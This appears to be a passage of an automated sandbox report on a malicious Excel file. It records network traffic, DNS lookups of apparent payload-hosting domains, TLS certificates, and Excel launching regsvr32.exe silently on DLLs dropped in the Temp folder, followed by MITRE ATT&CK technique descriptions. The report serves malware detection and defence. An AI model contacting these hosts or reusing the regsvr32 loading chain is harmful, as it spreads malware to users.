Jan 11, 2021 18:34:24.204910994 CET	49746	443	192.168.2.4	74.220.219.210
Jan 11, 2021 18:34:24.387743950 CET	443	49746	74.220.219.210	192.168.2.4
Jan 11, 2021 18:34:24.394406080 CET	443	49746	74.220.219.210	192.168.2.4
Jan 11, 2021 18:34:24.394457102 CET	443	49746	74.220.219.210	192.168.2.4
Jan 11, 2021 18:34:24.394490957 CET	443	49746	74.220.219.210	192.168.2.4
Jan 11, 2021 18:34:24.394702911 CET	49746	443	192.168.2.4	74.220.219.210
Jan 11, 2021 18:34:24.412053108 CET	49746	443	192.168.2.4	74.220.219.210
Jan 11, 2021 18:34:24.627211094 CET	443	49746	74.220.219.210	192.168.2.4
Jan 11, 2021 18:34:24.627523899 CET	49746	443	192.168.2.4	74.220.219.210
Jan 11, 2021 18:34:24.629590034 CET	49746	443	192.168.2.4	74.220.219.210
Jan 11, 2021 18:34:24.855716944 CET	443	49746	74.220.219.210	192.168.2.4
Jan 11, 2021 18:34:25.347995996 CET	443	49746	74.220.219.210	192.168.2.4
Jan 11, 2021 18:34:25.348062992 CET	443	49746	74.220.219.210	192.168.2.4
Jan 11, 2021 18:34:25.348104000 CET	443	49746	74.220.219.210	192.168.2.4
Jan 11, 2021 18:34:25.348189116 CET	49746	443	192.168.2.4	74.220.219.210
Jan 11, 2021 18:34:25.348248005 CET	49746	443	192.168.2.4	74.220.219.210
Jan 11, 2021 18:34:25.348264933 CET	49746	443	192.168.2.4	74.220.219.210
Jan 11, 2021 18:34:25.349865913 CET	443	49746	74.220.219.210	192.168.2.4
Jan 11, 2021 18:34:25.350034952 CET	49746	443	192.168.2.4	74.220.219.210
Jan 11, 2021 18:34:25.356636047 CET	49746	443	192.168.2.4	74.220.219.210
Jan 11, 2021 18:34:25.539294958 CET	443	49746	74.220.219.210	192.168.2.4
Jan 11, 2021 18:35:22.015347004 CET	49772	443	192.168.2.4	184.171.244.207
Jan 11, 2021 18:35:22.170032978 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.170439005 CET	49772	443	192.168.2.4	184.171.244.207
Jan 11, 2021 18:35:22.171555996 CET	49772	443	192.168.2.4	184.171.244.207
Jan 11, 2021 18:35:22.325958014 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.326647997 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.326694012 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.326731920 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.326759100 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.326896906 CET	49772	443	192.168.2.4	184.171.244.207
Jan 11, 2021 18:35:22.327735901 CET	49772	443	192.168.2.4	184.171.244.207
Jan 11, 2021 18:35:22.328883886 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.329075098 CET	49772	443	192.168.2.4	184.171.244.207
Jan 11, 2021 18:35:22.371404886 CET	49772	443	192.168.2.4	184.171.244.207
Jan 11, 2021 18:35:22.527342081 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.527679920 CET	49772	443	192.168.2.4	184.171.244.207
Jan 11, 2021 18:35:22.529355049 CET	49772	443	192.168.2.4	184.171.244.207
Jan 11, 2021 18:35:22.687218904 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.687271118 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.687308073 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.687355042 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.687395096 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.687431097 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.687469006 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.687506914 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.687542915 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.687551022 CET	49772	443	192.168.2.4	184.171.244.207
Jan 11, 2021 18:35:22.687580109 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.687627077 CET	49772	443	192.168.2.4	184.171.244.207
Jan 11, 2021 18:35:22.687679052 CET	49772	443	192.168.2.4	184.171.244.207
Jan 11, 2021 18:35:22.842542887 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.842598915 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.842636108 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.842684984 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.842725992 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.842763901 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.842888117 CET	49772	443	192.168.2.4	184.171.244.207
Jan 11, 2021 18:35:22.842986107 CET	49772	443	192.168.2.4	184.171.244.207
Jan 11, 2021 18:35:22.843539953 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.843583107 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.843619108 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.843666077 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.843708038 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.843725920 CET	49772	443	192.168.2.4	184.171.244.207
Jan 11, 2021 18:35:22.843744040 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.843755007 CET	49772	443	192.168.2.4	184.171.244.207
Jan 11, 2021 18:35:22.843781948 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.843797922 CET	49772	443	192.168.2.4	184.171.244.207
Jan 11, 2021 18:35:22.843820095 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.843849897 CET	49772	443	192.168.2.4	184.171.244.207
Jan 11, 2021 18:35:22.843924046 CET	49772	443	192.168.2.4	184.171.244.207
Jan 11, 2021 18:35:22.844774961 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.844813108 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.844861031 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.844871998 CET	49772	443	192.168.2.4	184.171.244.207
Jan 11, 2021 18:35:22.844917059 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.844953060 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.844959974 CET	49772	443	192.168.2.4	184.171.244.207
Jan 11, 2021 18:35:22.844990969 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.845046997 CET	49772	443	192.168.2.4	184.171.244.207
Jan 11, 2021 18:35:22.845113039 CET	49772	443	192.168.2.4	184.171.244.207
Jan 11, 2021 18:35:22.997668982 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.997721910 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.997761011 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.997797012 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.997843027 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.997885942 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.998074055 CET	49772	443	192.168.2.4	184.171.244.207
Jan 11, 2021 18:35:22.998126984 CET	49772	443	192.168.2.4	184.171.244.207
Jan 11, 2021 18:35:22.998311996 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.998359919 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.998397112 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.998404980 CET	49772	443	192.168.2.4	184.171.244.207
Jan 11, 2021 18:35:22.998433113 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.998480082 CET	443	49772	184.171.244.207	192.168.2.4
Jan 11, 2021 18:35:22.998482943 CET	49772	443	192.168.2.4	184.171.244.207

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2021 18:34:08.008697987 CET	49910	53	192.168.2.4	8.8.8.8
Jan 11, 2021 18:34:08.056622982 CET	53	49910	8.8.8.8	192.168.2.4
Jan 11, 2021 18:34:08.924101114 CET	55854	53	192.168.2.4	8.8.8.8
Jan 11, 2021 18:34:08.971963882 CET	53	55854	8.8.8.8	192.168.2.4
Jan 11, 2021 18:34:09.869496107 CET	64549	53	192.168.2.4	8.8.8.8
Jan 11, 2021 18:34:09.923326015 CET	53	64549	8.8.8.8	192.168.2.4
Jan 11, 2021 18:34:10.643454075 CET	63153	53	192.168.2.4	8.8.8.8
Jan 11, 2021 18:34:10.691546917 CET	53	63153	8.8.8.8	192.168.2.4
Jan 11, 2021 18:34:11.739825010 CET	52991	53	192.168.2.4	8.8.8.8
Jan 11, 2021 18:34:11.787777901 CET	53	52991	8.8.8.8	192.168.2.4
Jan 11, 2021 18:34:12.685504913 CET	53700	53	192.168.2.4	8.8.8.8
Jan 11, 2021 18:34:12.742271900 CET	53	53700	8.8.8.8	192.168.2.4
Jan 11, 2021 18:34:18.222423077 CET	51726	53	192.168.2.4	8.8.8.8
Jan 11, 2021 18:34:18.270397902 CET	53	51726	8.8.8.8	192.168.2.4
Jan 11, 2021 18:34:19.361457109 CET	56794	53	192.168.2.4	8.8.8.8
Jan 11, 2021 18:34:19.419315100 CET	53	56794	8.8.8.8	192.168.2.4
Jan 11, 2021 18:34:19.860851049 CET	56534	53	192.168.2.4	8.8.8.8
Jan 11, 2021 18:34:19.931626081 CET	53	56534	8.8.8.8	192.168.2.4
Jan 11, 2021 18:34:20.403836012 CET	56627	53	192.168.2.4	8.8.8.8
Jan 11, 2021 18:34:20.462871075 CET	53	56627	8.8.8.8	192.168.2.4
Jan 11, 2021 18:34:20.875788927 CET	56534	53	192.168.2.4	8.8.8.8
Jan 11, 2021 18:34:20.963350058 CET	53	56534	8.8.8.8	192.168.2.4
Jan 11, 2021 18:34:21.875482082 CET	56534	53	192.168.2.4	8.8.8.8
Jan 11, 2021 18:34:21.923306942 CET	53	56534	8.8.8.8	192.168.2.4
Jan 11, 2021 18:34:22.007956982 CET	56621	53	192.168.2.4	8.8.8.8
Jan 11, 2021 18:34:22.058783054 CET	53	56621	8.8.8.8	192.168.2.4
Jan 11, 2021 18:34:23.328639984 CET	63116	53	192.168.2.4	8.8.8.8
Jan 11, 2021 18:34:23.376635075 CET	53	63116	8.8.8.8	192.168.2.4
Jan 11, 2021 18:34:23.847673893 CET	64078	53	192.168.2.4	8.8.8.8
Jan 11, 2021 18:34:23.875305891 CET	56534	53	192.168.2.4	8.8.8.8
Jan 11, 2021 18:34:23.931555033 CET	53	56534	8.8.8.8	192.168.2.4
Jan 11, 2021 18:34:24.013845921 CET	53	64078	8.8.8.8	192.168.2.4
Jan 11, 2021 18:34:24.455930948 CET	64801	53	192.168.2.4	8.8.8.8
Jan 11, 2021 18:34:24.504185915 CET	53	64801	8.8.8.8	192.168.2.4
Jan 11, 2021 18:34:26.400738955 CET	61721	53	192.168.2.4	8.8.8.8
Jan 11, 2021 18:34:26.448645115 CET	53	61721	8.8.8.8	192.168.2.4
Jan 11, 2021 18:34:27.571365118 CET	51255	53	192.168.2.4	8.8.8.8
Jan 11, 2021 18:34:27.622203112 CET	53	51255	8.8.8.8	192.168.2.4
Jan 11, 2021 18:34:28.024199009 CET	56534	53	192.168.2.4	8.8.8.8
Jan 11, 2021 18:34:28.080625057 CET	53	56534	8.8.8.8	192.168.2.4
Jan 11, 2021 18:34:32.671776056 CET	61522	53	192.168.2.4	8.8.8.8
Jan 11, 2021 18:34:32.722551107 CET	53	61522	8.8.8.8	192.168.2.4
Jan 11, 2021 18:34:37.237567902 CET	52337	53	192.168.2.4	8.8.8.8
Jan 11, 2021 18:34:37.296057940 CET	53	52337	8.8.8.8	192.168.2.4
Jan 11, 2021 18:34:49.525818110 CET	55046	53	192.168.2.4	8.8.8.8
Jan 11, 2021 18:34:49.582385063 CET	53	55046	8.8.8.8	192.168.2.4
Jan 11, 2021 18:34:50.182993889 CET	49612	53	192.168.2.4	8.8.8.8
Jan 11, 2021 18:34:50.239234924 CET	53	49612	8.8.8.8	192.168.2.4
Jan 11, 2021 18:34:50.784013987 CET	49285	53	192.168.2.4	8.8.8.8
Jan 11, 2021 18:34:50.880352974 CET	53	49285	8.8.8.8	192.168.2.4
Jan 11, 2021 18:34:50.904299021 CET	50601	53	192.168.2.4	8.8.8.8
Jan 11, 2021 18:34:50.971282005 CET	53	50601	8.8.8.8	192.168.2.4
Jan 11, 2021 18:34:51.561275005 CET	60875	53	192.168.2.4	8.8.8.8
Jan 11, 2021 18:34:51.620714903 CET	53	60875	8.8.8.8	192.168.2.4
Jan 11, 2021 18:34:52.090665102 CET	56448	53	192.168.2.4	8.8.8.8
Jan 11, 2021 18:34:52.150152922 CET	53	56448	8.8.8.8	192.168.2.4
Jan 11, 2021 18:34:52.686764002 CET	59172	53	192.168.2.4	8.8.8.8
Jan 11, 2021 18:34:52.746109962 CET	53	59172	8.8.8.8	192.168.2.4
Jan 11, 2021 18:34:53.340668917 CET	62420	53	192.168.2.4	8.8.8.8
Jan 11, 2021 18:34:53.397283077 CET	53	62420	8.8.8.8	192.168.2.4
Jan 11, 2021 18:34:54.090543032 CET	60579	53	192.168.2.4	8.8.8.8
Jan 11, 2021 18:34:54.147067070 CET	53	60579	8.8.8.8	192.168.2.4
Jan 11, 2021 18:34:55.045511007 CET	50183	53	192.168.2.4	8.8.8.8
Jan 11, 2021 18:34:55.104269981 CET	53	50183	8.8.8.8	192.168.2.4
Jan 11, 2021 18:34:55.731673002 CET	61531	53	192.168.2.4	8.8.8.8
Jan 11, 2021 18:34:55.791176081 CET	53	61531	8.8.8.8	192.168.2.4
Jan 11, 2021 18:35:07.712913990 CET	49228	53	192.168.2.4	8.8.8.8
Jan 11, 2021 18:35:07.763699055 CET	53	49228	8.8.8.8	192.168.2.4
Jan 11, 2021 18:35:08.030400991 CET	59794	53	192.168.2.4	8.8.8.8
Jan 11, 2021 18:35:08.100579977 CET	53	59794	8.8.8.8	192.168.2.4
Jan 11, 2021 18:35:10.449249029 CET	55916	53	192.168.2.4	8.8.8.8
Jan 11, 2021 18:35:10.507117987 CET	53	55916	8.8.8.8	192.168.2.4
Jan 11, 2021 18:35:21.817789078 CET	52752	53	192.168.2.4	8.8.8.8
Jan 11, 2021 18:35:22.010591030 CET	53	52752	8.8.8.8	192.168.2.4
Jan 11, 2021 18:35:27.751754045 CET	60542	53	192.168.2.4	8.8.8.8
Jan 11, 2021 18:35:27.812676907 CET	53	60542	8.8.8.8	192.168.2.4
Jan 11, 2021 18:35:41.972830057 CET	60689	53	192.168.2.4	8.8.8.8
Jan 11, 2021 18:35:42.020904064 CET	53	60689	8.8.8.8	192.168.2.4
Jan 11, 2021 18:35:43.463135958 CET	64206	53	192.168.2.4	8.8.8.8
Jan 11, 2021 18:35:43.519586086 CET	53	64206	8.8.8.8	192.168.2.4
Jan 11, 2021 18:35:55.801167965 CET	50904	53	192.168.2.4	8.8.8.8
Jan 11, 2021 18:35:55.982192993 CET	53	50904	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 11, 2021 18:34:23.847673893 CET	192.168.2.4	8.8.8.8	0xb17a	Standard query (0)	bulksms.interweblimited.com	A (IP address)	IN (0x0001)
Jan 11, 2021 18:35:21.817789078 CET	192.168.2.4	8.8.8.8	0x6d5e	Standard query (0)	sistacweb.com	A (IP address)	IN (0x0001)
Jan 11, 2021 18:35:55.801167965 CET	192.168.2.4	8.8.8.8	0x73e6	Standard query (0)	osmosisecuador.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jan 11, 2021 18:34:24.013845921 CET	8.8.8.8	192.168.2.4	0xb17a	No error (0)	bulksms.interweblimited.com	74.220.219.210	A (IP address)	IN (0x0001)
Jan 11, 2021 18:35:22.010591030 CET	8.8.8.8	192.168.2.4	0x6d5e	No error (0)	sistacweb.com	184.171.244.207	A (IP address)	IN (0x0001)
Jan 11, 2021 18:35:55.982192993 CET	8.8.8.8	192.168.2.4	0x73e6	No error (0)	osmosisecuador.com	192.185.41.153	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Jan 11, 2021 18:34:24.394490957 CET	74.220.219.210	443	192.168.2.4	49746	CN=www.eaglefreelance.com CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Mon Dec 14 02:31:55 CET 2020 Wed Oct 07 21:21:40 CEST 2020	Sun Mar 14 02:31:55 CET 2021 Wed Sep 29 21:21:40 CEST 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
Jan 11, 2021 18:34:24.394490957 CET	74.220.219.210	443	192.168.2.4	49746	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		37f463bf4616ecd445d4a1937da06e19
Jan 11, 2021 18:35:22.328883886 CET	184.171.244.207	443	192.168.2.4	49772	CN=sistacweb.com CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Tue Dec 08 01:00:00 CET 2020 Mon May 18 02:00:00 CEST 2015 Thu Jan 01 01:00:00 CET 2004	Tue Mar 09 00:59:59 CET 2021 Sun May 18 01:59:59 CEST 2025 Mon Jan 01 00:59:59 CET 2029	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
					CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US	CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	Mon May 18 02:00:00 CEST 2015	Sun May 18 01:59:59 CEST 2025
					CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Thu Jan 01 01:00:00 CET 2004	Mon Jan 01 00:59:59 CET 2029
Jan 11, 2021 18:35:27.269882917 CET	77.220.64.37	443	192.168.2.4	49773	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,10-11-13-35-23-65281,29-23-24,0	51c64c77e60f3980eea90869b68c58a8
Jan 11, 2021 18:35:56.307704926 CET	192.185.41.153	443	192.168.2.4	49841	CN=osmosisecuador.osmosisperu.com CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Mon Jan 11 07:22:00 CET 2021 Wed Oct 07 21:21:40 CEST 2020	Sun Apr 11 08:22:00 CEST 2021 Wed Sep 29 21:21:40 CEST 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
Jan 11, 2021 18:35:56.307704926 CET	192.185.41.153	443	192.168.2.4	49841	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		37f463bf4616ecd445d4a1937da06e19
Jan 11, 2021 18:36:01.513374090 CET	77.220.64.37	443	192.168.2.4	49856	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,10-11-13-35-23-65281,29-23-24,0	51c64c77e60f3980eea90869b68c58a8

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 6304 Parent PID: 800

General

Start time:	18:34:17
Start date:	11/01/2021
Path:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Imagebase:	0x840000
File size:	27110184 bytes
MD5 hash:	5D6638F2C8F8571C593999C58866007E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: regsvr32.exe PID: 5544 Parent PID: 6304

General

Start time:	18:34:25
Start date:	11/01/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\mkmanoo.dll.
Imagebase:	0xbc0000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: splwow64.exe PID: 6712 Parent PID: 6304

General

Start time:	18:34:25
Start date:	11/01/2021
Path:	C:\Windows\splwow64.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\splwow64.exe 12288
Imagebase:	0x7ff64b5d0000
File size:	130560 bytes
MD5 hash:	8D59B31FF375059E3C32B17BF31A76D5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: regsvr32.exe PID: 860 Parent PID: 6304

General

Start time:	18:35:22
Start date:	11/01/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\dunjzsby.dll.
Imagebase:	0xbc0000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: regsvr32.exe PID: 6384 Parent PID: 6304

General

Start time:	18:35:57
Start date:	11/01/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\xnaitann.dll.
Imagebase:	0xbc0000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

Code Analysis

Reset < >

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

